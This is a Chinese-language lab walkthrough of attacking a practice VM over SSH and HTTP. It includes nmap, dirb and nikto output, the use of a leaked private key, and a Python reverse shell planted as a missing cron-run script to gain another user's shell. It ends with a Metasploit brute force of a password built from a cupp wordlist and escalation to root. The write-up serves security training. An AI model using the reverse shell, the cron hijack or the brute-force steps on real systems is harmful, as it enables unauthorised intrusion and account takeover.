工具:
kali linux
ssh root渗透靶机
操作步骤:
ssh协议介绍
SSH为Secure Shell的缩写,由IETF网络小组(Network Working Group)所指定;SSH为建立在应用层基础上的安全协议
SSH是目前较可靠,专为远程登录会话和其他网络提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题。
SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix以及其他平台,都可以运行SSH。基于TCP 22号端口的服务。
SSH协议认证机制
基于口令的安全认证
只要你知道自己的账号和口令,就可以登陆到远程主机。所有传输的数据都会被加密,但是不能保证你正在连接的服务器就是你想连接的服务器。可能会有别的服务器在冒充真正的服务器,也就是受到“中间人”这种方式的攻击。
基于密钥的安全认证
需要依靠密钥,也就是你必须为自己创建一对密钥,并把公用密钥放在需要访问的服务器上。如果你要连接到SSH服务器上,客户端软件就会向服务器发出请求,请求用你的私有密钥进行安全验证。服务器收到请求之后,先在该服务器上你的主目录下寻找你的公用密钥,然后把它和你发送过来的私有密钥进行比较。如果两个密钥一致,则验证成功,登陆服务器。
在CTF中大部分以id_rsa为私钥,id_rsa.pub为公钥
SSH协议验证机制弱点
基于口令的安全验证
基于字典的暴力破解,破解对应用户名和密码,通过SSH客户端连接到远程主机的SSH服务,实现对服务器的一定控制。(不一定是root权限)
基于密钥的安全验证
通过对主机信息收集,获取到泄漏的用户名和对应的密钥。
chmod 600 id_rsa
ssh -i id_rsa usr@ip_address 登陆服务器。(不一定是root权限)
第一步,探测靶机ipnetdiscover -r 192.168.2.1/24
结果如图:
第二步,信息探测
对于给定IP地址的靶场机器,对其进行渗透测试,首先需要考虑靶场机器开放的服务。
探测靶场开放的服务与服务的版本
nmap -sV ip_address
探测靶场全部信息
nmap -A -v ip_address
探测靶场的操作系统类型与版本
nmap -O ip_address
结果如下:
root@kali:~# nmap -sV 192.168.2.102
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 05:33 EDT
Nmap scan report for debian.lan (192.168.2.102)
Host is up (0.0018s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
MAC Address: 08:00:27:BB:7B:CE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds
root@kali:~# nmap -A -v 192.168.2.102
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 05:36 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 05:36
Completed NSE at 05:36, 0.00s elapsed
Initiating NSE at 05:36
Completed NSE at 05:36, 0.00s elapsed
Initiating ARP Ping Scan at 05:36
Scanning 192.168.2.102 [1 port]
Completed ARP Ping Scan at 05:36, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:36
Completed Parallel DNS resolution of 1 host. at 05:36, 0.00s elapsed
Initiating SYN Stealth Scan at 05:36
Scanning debian.lan (192.168.2.102) [1000 ports]
Discovered open port 111/tcp on 192.168.2.102
Discovered open port 22/tcp on 192.168.2.102
Discovered open port 80/tcp on 192.168.2.102
Completed SYN Stealth Scan at 05:36, 0.28s elapsed (1000 total ports)
Initiating Service scan at 05:36
Scanning 3 services on debian.lan (192.168.2.102)
Completed Service scan at 05:36, 6.11s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against debian.lan (192.168.2.102)
NSE: Script scanning 192.168.2.102.
Initiating NSE at 05:36
Completed NSE at 05:36, 0.72s elapsed
Initiating NSE at 05:36
Completed NSE at 05:36, 0.01s elapsed
Nmap scan report for debian.lan (192.168.2.102)
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 43295/udp status
|_ 100024 1 45779/tcp status
MAC Address: 08:00:27:BB:7B:CE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.050 days (since Wed Aug 14 04:24:11 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.26 ms debian.lan (192.168.2.102)
NSE: Script Post-scanning.
Initiating NSE at 05:36
Completed NSE at 05:36, 0.00s elapsed
Initiating NSE at 05:36
Completed NSE at 05:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.28 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)
root@kali:~# nmap -O 192.168.2.102
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 05:37 EDT
Nmap scan report for debian.lan (192.168.2.102)
Host is up (0.0019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
MAC Address: 08:00:27:BB:7B:CE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.54 seconds
分析探测结果
对于SSH服务的22端口的靶场
首先考虑
1、暴力破解
2、私钥泄漏(私钥有没有对应的密码、是否可以找到私钥的用户名)
对于开放http服务的80端口或者其他端口的靶场
首先考虑
1、通过浏览器访问对应的靶场http服务,如http://ip_address:port
2、使用探测工具对http的目录进行探测,如dirb http://ip_address:port/
特别注意 特殊端口(大于1024端口)
挖掘敏感信息
使用浏览器对靶场IP的http服务探测,对页面中展示的内容也要注意,尤其是联系人等信息(有可能就是ssh的用户名信息),递归访问,力争把每一个dirb扫描到的目录页面都访问查看;
尤其对robots.txt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_rsa);
对于某些靶场,也可以使用nikto扫描器来挖掘敏感信息;
nikto -host ip_address
特别注意config等特殊敏感文件,要细读扫描的结果。挖掘可以利用的敏感信息;
打开Firefox,输入ip_address,结果如图:
我们发现这是一个security company的index页面,同过浏览我们发现了一些敏感信息:
我们可以猜测靶机的用户中有这三个人。
接着我们使用dirb工具来探测目录
结果如下(太长了,就选最有用的吧。。):
root@kali:~# dirb http://192.168.2.102/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Aug 14 06:01:40 2019
URL_BASE: http://192.168.2.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.2.102/ ----
==> DIRECTORY: http://192.168.2.102/files/
==> DIRECTORY: http://192.168.2.102/icons/
+ http://192.168.2.102/index.html (CODE:200|SIZE:5651)
==> DIRECTORY: http://192.168.2.102/manual/
+ http://192.168.2.102/robots.txt (CODE:200|SIZE:57)
+ http://192.168.2.102/server-status (CODE:403|SIZE:301)
---- Entering directory: http://192.168.2.102/files/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.2.102/icons/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.2.102/manual/ ----
==> DIRECTORY: http://192.168.2.102/manual/da/
==> DIRECTORY: http://192.168.2.102/manual/de/
==> DIRECTORY: http://192.168.2.102/manual/en/
==> DIRECTORY: http://192.168.2.102/manual/es/
==> DIRECTORY: http://192.168.2.102/manual/fr/
==> DIRECTORY: http://192.168.2.102/manual/images/
+ http://192.168.2.102/manual/index.html (CODE:200|SIZE:626)
==> DIRECTORY: http://192.168.2.102/manual/ja/
==> DIRECTORY: http://192.168.2.102/manual/ko/
==> DIRECTORY: http://192.168.2.102/manual/style/
==> DIRECTORY: http://192.168.2.102/manual/tr/
==> DIRECTORY: http://192.168.2.102/manual/zh-cn/
---- Entering directory: http://192.168.2.102/manual/da/ ----
==> DIRECTORY: http://192.168.2.102/manual/da/developer/
==> DIRECTORY: http://192.168.2.102/manual/da/faq/
==> DIRECTORY: http://192.168.2.102/manual/da/howto/
... ...
我们还可以使用nikto扫描
root@kali:~/Desktop# nikto -host 192.168.2.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.102
+ Target Hostname: 192.168.2.102
+ Target Port: 80
+ Start Time: 2019-08-14 06:17:34 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wordpress-blog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: 1613, size: 5517867aefd40, mtime: gzip
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2019-08-14 06:18:14 (GMT-4) (40 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto可以检测敏感信息名,功能较为强大
首先我们先进入robots.txt中查看有没有有用的信息
我们发现了两个子目录,我们可以看一下里面有什么。
(我tm。。。)
我们没有找到有关信息,所以我查找别的链接
在icons中我们发现了意外惊喜,我们看到了一个txt文件,打开它
我们发现了私钥。然后我们把私钥下载到桌面上顺便改个名字
root@kali:~# cd Desktop
root@kali:~/Desktop# wget "http://192.168.2.102/icons/VDSoyuAXiO.txt"
--2019-08-14 06:16:04-- http://192.168.2.102/icons/VDSoyuAXiO.txt
Connecting to 192.168.2.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1677 (1.6K) [text/plain]
Saving to: ‘VDSoyuAXiO.txt’
VDSoyuAXiO.txt 100%[==================>] 1.64K --.-KB/s in 0s
2019-08-14 06:16:04 (34.3 MB/s) - ‘VDSoyuAXiO.txt’ saved [1677/1677]
root@kali:~/Desktop# mv VDSoyuAXiO.txt id_rsa
改好名字后,我们再给id_rsa进行提权
然后我们开始进行ssh连接
注意:如果id_rsa没有解密密码,可以直接使用。但是如果id_rsa有解密密码,那么就需要进行对应的破解。
root@kali:~/Desktop# ssh -i id_rsa martin@192.168.2.102
成功进入靶机。
我们发现有三个用户名,与网站上的信息同等。
扩大战果
登陆服务器后,我们需要做以下操作。
1、查看当前用户whoami
2、id 查看当前用户的权限
3、查看根目录,寻找flag
如果是root权限,那么表明这个靶场就被全部拿下。但是如果不是,就肯定需要提权。一般情况下,flag文件只属于root用户和对应的用户组;
cat /etc/passwd //查看所有用户的列表
cat /etc/group //查看用户组
find / -user 用户名 //查看属于某些用户的文件
/tmp //查看缓冲文件目录
深入挖掘
通过 /etc/crontab文件,设定系统定期执行的任务,编辑,需要root权限。不同的用户都可以有不同的定时任务
cat /etc/crontab 挖掘其他用户是否有定时任务,并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。
如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行文件,可以自行创建反弹shell,然后netcat执行监听获取对应用户的权限。
如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。
martin@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
我们再crontab中发现jimmy在/tmp文件中有一个sekurity.py文件
这时我们查看/tmp目录
我们发现没有sekurity.py文件,这时我们就可以创建反弹shell了。
我们现在kali上创建一个1.py文件,然后在文件中写入如下程序:
#!/usr/bin/python
import os, subprocess, socket
s=socket.socket()
s.connect(("192.168.2.165",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
程序剖析:
os.dup2(fd, fd2)
os.dup2()方法用于将一个文件描述符fd复制到另一个fd2
fileno()用来取得文件描述词
如果程序只有一个os.dup2(s.fileno(),0),那么只能在靶机上创建shell,断开连接后会直接回到kali。
如果有os.dup2(s.fileno(),0) os.dup2(s.fileno(),1),也只能在靶机上创建shell,但是断开连接后还会在靶机上。
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
这样就会创建反弹shell
创建好反弹shell,我们把源码复制下来在靶机的/tmp目录中新建一个sekurity.py,并赋予其可执行权限。
创建好后,我们开始在kali中监听端口
查看端口占用命令
netstat -pantu
crontab文件是定时任务执行文件,通过观察我们发现jimmy用户的sekurity.py每5分钟会自动执行一次。所以,我们只要耐心等待5分钟,jimmy用户就会创建反弹shell。
如果我们直接python /tmp/sekurity.py的话执行的人就会是martin。
5min过后,我们发现我们已经进入shell,这时,我们查看一下当前用户
是jimmy用户
深入挖掘
目标:寻找可以root靶场机器的方式
su -root
查看用户 whoami
查看对应权限 id
切换到 /home/用户名 目录查看是否具有可以提升root权限的文件;
接下来我们查看一下用户目录的文件
查看一下networker文件
我们发现该文件没有价值,所以我们把目标转为hadi用户
背水一战
万不得已的时候,只能对ssh服务进行暴力破解。破解最后一个用户名。破解工具,如hydra、medusa等;
我们这次使用cupp创建字典
利用cupp创建字典
apt-get install cupp
Kali Linux下社工密码字典生成工具Cupp和Cewl教程
创建密码字典文件
root@kali:~/Desktop/common-password# cupp -i
[+] Insert the informations about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: hadi
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:y
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to hadi.txt, counting 432 words.
[+] Now load your pistolero with hadi.txt and shoot! Good luck!
hadi.txt会自行被创建
使用metasploit破解SSH
在终端输入msfconsole
我们进入了metasploit,我们使用ssh_login模块进行渗透攻击。
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) >
我们要把所有的yes都填上
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.2.102
rhosts => 192.168.2.102
msf5 auxiliary(scanner/ssh/ssh_login) > set threads 5
threads => 5
msf5 auxiliary(scanner/ssh/ssh_login) > set username hadi
username => hadi
msf5 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/Desktop/hadi.txt
pass_file => /root/Desktop/hadi.txt
msf5 auxiliary(scanner/ssh/ssh_login) > show options
这时,我们再查看一下设定
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /root/Desktop/hadi.txt no File containing passwords, one per line
RHOSTS 192.168.2.102 yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 5 yes The number of concurrent threads
USERNAME hadi no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
注:VERBOSE为true时,可以实时监控情况
我们run一下,让渗透模块自己去渗透即可。
msf5 auxiliary(scanner/ssh/ssh_login) > run
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi10'
[!] No active DB -- Credential data will not be saved!
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi11'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi12'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi13'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi14'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi15'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi16'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi17'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi18'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi19'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi20'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2008'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2009'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2010'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2011'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2012'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2013'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2014'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2015'
... ...
(这次cupp并不能把密码暴力破解出来,所以暴力破解并不容易)
密码为hadi123
我们发现session 1已经被建立
这时,我们进入session
优化会话
我们发现和我们平常的终端不一样
我们使用以下命令
python -c "import pty; pty.spawn('/bin/bash')"
结果如下:
成为了我们想要的终端结果
接下来我们试一下提权
输入密码:hadi123进行尝试
成功进入root权限。
查看/root目录
root@debian:/home/hadi# cd /root
cd /root
root@debian:~# ls
ls
flag.txt
root@debian:~#
发现flag
扫一扫
682
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
